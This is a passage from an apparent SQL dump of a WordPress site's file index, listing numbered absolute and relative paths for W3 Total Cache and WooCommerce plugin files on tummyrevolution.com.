ummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/stubs/Normalizer.php','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/stubs/Normalizer.php'),(6506,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/unidata/canonicalComposition.php','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/unidata/canonicalComposition.php'),(6507,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/unidata/canonicalDecomposition.php','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/unidata/canonicalDecomposition.php'),(6508,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/unidata/combiningClass.php','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/unidata/combiningClass.php'),(6509,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/unidata/compatibilityDecomposition.php','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/unidata/compatibilityDecomposition.php'),(6510,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/bootstrap.php','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/bootstrap.php'),(6511,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/composer.json','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/composer.json'),(6512,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/w3-total-cache-api.php','wp-content/plugins/w3-total-cache/w3-total-cache-api.php'),(6513,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/w3-total-cache-old-php.php','wp-content/plugins/w3-total-cache/w3-total-cache-old-php.php'),(6514,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/w3-total-cache.php','wp-content/plugins/w3-total-cache/w3-total-cache.php'),(6515,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/wp-content/advanced-cache.php','wp-content/plugins/w3-total-cache/wp-content/advanced-cache.php'),(6516,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/wp-content/db.php','wp-content/plugins/w3-total-cache/wp-content/db.php'),(6517,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/wp-content/index.html','wp-content/plugins/w3-total-cache/wp-content/index.html'),(6518,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/wp-content/object-cache.php','wp-content/plugins/w3-total-cache/wp-content/object-cache.php'),(6519,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/0e8ec0e45d8a1d55b30c.png','wp-content/plugins/woocommerce/assets/client/admin/0e8ec0e45d8a1d55b30c.png'),(6520,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/46f3be5272a3932c5a1a.png','wp-content/plugins/woocommerce/assets/client/admin/46f3be5272a3932c5a1a.png'),(6521,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/64dabbb10478d0e2b133.svg','wp-content/plugins/woocommerce/assets/client/admin/64dabbb10478d0e2b133.svg'),(6522,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/7a66c49439f3a365c211.png','wp-content/plugins/woocommerce/assets/client/admin/7a66c49439f3a365c211.png'),(6523,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/838cedcc9d9dfff18d8a.png','wp-content/plugins/woocommerce/assets/client/admin/838cedcc9d9dfff18d8a.png'),(6524,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/93973815f7cd64d5f512.png','wp-content/plugins/woocommerce/assets/client/admin/93973815f7cd64d5f512.png'),(6525,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/activity-panels-help/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/activity-panels-help/style-rtl.css'),(6526,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/activity-panels-inbox/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/activity-panels-inbox/style-rtl.css'),(6527,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/admin-layout/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/admin-layout/index.asset.php'),(6528,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/admin-layout/index.js','wp-content/plugins/woocommerce/assets/client/admin/admin-layout/index.js'),(6529,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/admin-layout/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/admin-layout/style-rtl.css'),(6530,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/admin-layout/style.css','wp-content/plugins/woocommerce/assets/client/admin/admin-layout/style.css'),(6531,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report/style-rtl.css'),(6532,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-categories/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-categories/style-rtl.css'),(6533,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-coupons/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-coupons/style-rtl.css'),(6534,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-customers/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-customers/style-rtl.css'),(6535,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-downloads/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-downloads/style-rtl.css'),(6536,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-orders/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-orders/style-rtl.css'),(6537,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-products/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-products/style-rtl.css'),(6538,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-revenue/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-revenue/style-rtl.css'),(6539,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-stock/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-stock/style-rtl.css'),(6540,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-taxes/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-taxes/style-rtl.css'),(6541,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-variations/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-variations/style-rtl.css'),(6542,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-settings/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/analytics-settings/style-rtl.css'),(6543,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/app/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/app/index.asset.php'),(6544,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/app/index.js','wp-content/plugins/woocommerce/assets/client/admin/app/index.js'),(6545,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/app/index.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/app/index.js.LICENSE.txt'),(6546,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/app/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/app/style-rtl.css'),(6547,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/app/style.css','wp-content/plugins/woocommerce/assets/client/admin/app/style.css'),(6548,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/beta-features-tracking-modal/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/beta-features-tracking-modal/style-rtl.css'),(6549,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/beta-features-tracking-modal/style.css','wp-content/plugins/woocommerce/assets/client/admin/beta-features-tracking-modal/style.css'),(6550,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/bfec8d1574ef61285fc9.svg','wp-content/plugins/woocommerce/assets/client/admin/bfec8d1574ef61285fc9.svg'),(6551,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/cc33bd6b007cb731bcc3.png','wp-content/plugins/woocommerce/assets/client/admin/cc33bd6b007cb731bcc3.png'),(6552,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/1061.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/1061.js'),(6553,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/1061.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/chunks/1061.js.LICENSE.txt'),(6554,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/1828.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/1828.style.css'),(6555,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/185.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/185.style.css'),(6556,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/2397.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/2397.style.css'),(6557,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/2502.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/2502.style.css'),(6558,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/2624.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/2624.style.css'),(6559,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/2953.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/2953.style.css'),(6560,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/3307.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/3307.style.css'),(6561,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/3576.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/3576.style.css'),(6562,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/3700.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/3700.style.css'),(6563,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/3727.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/3727.js'),(6564,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/3994.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/3994.style.css'),(6565,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/4011.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/4011.style.css'),(6566,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/4284.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/4284.js'),(6567,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/4284.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/chunks/4284.js.LICENSE.txt'),(6568,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/4854.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/4854.style.css'),(6569,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/4882.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/4882.style.css'),(6570,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/4891.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/4891.js'),(6571,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/4891.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/4891.style.css'),(6572,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/5009.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/5009.style.css'),(6573,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/5502.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/5502.style.css'),(6574,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/5792.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/5792.js'),(6575,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/5792.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/5792.style.css'),(6576,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/5838.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/5838.js'),(6577,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/6125.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/6125.style.css'),(6578,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/6412.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/6412.js'),(6579,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/6412.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/chunks/6412.js.LICENSE.txt'),(6580,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/6732.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/6732.style.css'),(6581,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/6824.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/6824.style.css'),(6582,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/727.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/727.style.css'),(6583,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/7387.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/7387.style.css'),(6584,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/7708.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/7708.style.css'),(6585,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/7846.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/7846.js'),(6586,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/8544.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/8544.style.css'),(6587,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/8597.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/8597.style.css'),(6588,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/8758.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/8758.js'),(6589,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/8851.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/8851.style.css'),(6590,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/8994.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/8994.js'),(6591,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/925.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/925.style.css'),(6592,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9360.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/9360.style.css'),(6593,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9456.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/9456.style.css'),(6594,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9529.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/9529.js'),(6595,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9616.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/9616.js'),(6596,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9669.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/9669.style.css'),(6597,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9792.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/9792.style.css'),(6598,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9966.style.css','wp-content/plugins/woocommerce/assets/client/admin/chunks/9966.style.css'),(6599,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-help.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-help.js'),(6600,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-inbox.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-inbox.js'),(6601,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-setup.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-setup.js'),(6602,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-categories.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-categories.js'),(6603,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-coupons.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-coupons.js'),(6604,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-customers.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-customers.js'),(6605,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-downloads.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-downloads.js'),(6606,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-orders.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-orders.js'),(6607,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-products.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-products.js'),(6608,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-revenue.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-revenue.js'),(6609,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-stock.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-stock.js'),(6610,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-taxes.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-taxes.js'),(6611,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-variations.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-variations.js'),(6612,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report.js'),(6613,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-settings.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-settings.js'),(6614,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/category-metabox.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/category-metabox.js'),(6615,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/core-profiler.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/core-profiler.js'),(6616,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/customizable-dashboard.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/customizable-dashboard.js'),(6617,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/customize-store.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/customize-store.js'),(6618,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/dashboard-charts.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/dashboard-charts.js'),(6619,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/dashboard.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/dashboard.js'),(6620,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/edit-product-page.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/edit-product-page.js'),(6621,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/homescreen.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/homescreen.js'),(6622,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/leaderboards.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/leaderboards.js'),(6623,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/marketplace.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/marketplace.js'),(6624,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/multichannel-marketing.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/multichannel-marketing.js'),(6625,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/payment-recommendations.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/payment-recommendations.js'),(6626,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/product-page.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/product-page.js'),(6627,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/profile-wizard.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/profile-wizard.js'),(6628,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/shipping-recommendations.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/shipping-recommendations.js'),(6629,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/store-alerts.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/store-alerts.js'),(6630,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/store-performance.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/store-performance.js'),(6631,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/wcpay-payment-welcome-page.js','wp-content/plugins/woocommerce/assets/client/admin/chunks/wcpay-payment-welcome-page.js'),(6632,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/components/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/components/index.asset.php'),(6633,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/components/index.js','wp-content/plugins/woocommerce/assets/client/admin/components/index.js'),(6634,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/components/index.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/components/index.js.LICENSE.txt'),(6635,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/components/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/components/style-rtl.css'),(6636,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/components/style.css','wp-content/plugins/woocommerce/assets/client/admin/components/style.css'),(6637,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/core-profiler/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/core-profiler/style-rtl.css'),(6638,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.asset.php'),(6639,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.js','wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.js'),(6640,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.js.LICENSE.txt'),(6641,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/currency/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/currency/index.asset.php'),(6642,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/currency/index.js','wp-content/plugins/woocommerce/assets/client/admin/currency/index.js'),(6643,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/index.asset.php'),(6644,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/index.js','wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/index.js'),(6645,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/index.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/index.js.LICENSE.txt'),(6646,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/style-rtl.css'),(6647,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/style.css','wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/style.css'),(6648,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customize-store/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/customize-store/style-rtl.css'),(6649,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/d070003c8575faa9f2fc.svg','wp-content/plugins/woocommerce/assets/client/admin/d070003c8575faa9f2fc.svg'),(6650,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/d11c9a0dc859f1236a96.png','wp-content/plugins/woocommerce/assets/client/admin/d11c9a0dc859f1236a96.png'),(6651,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/dashboard/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/dashboard/style-rtl.css'),(6652,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/dashboard-charts/style-rtl.css','wp-content/plugins/woocommerce/assets/client/admin/dashboard-charts/style-rtl.css'),(6653,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/data/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/data/index.asset.php'),(6654,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/data/index.js','wp-content/plugins/woocommerce/assets/client/admin/data/index.js'),(6655,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/data/index.js.LICENSE.txt','wp-content/plugins/woocommerce/assets/client/admin/data/index.js.LICENSE.txt'),(6656,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/date/index.asset.php','wp-content/plugins/woocommerce/assets/client/admin/date/index.asset.php'),(6657,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/date/index.js','wp-content/plugins/woocommerce/assets/client/admin/date/index.js'),(6658,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/dbfe730286a89feb7ce0.svg','wp-content/plugins/woocommerce/assets/client/admin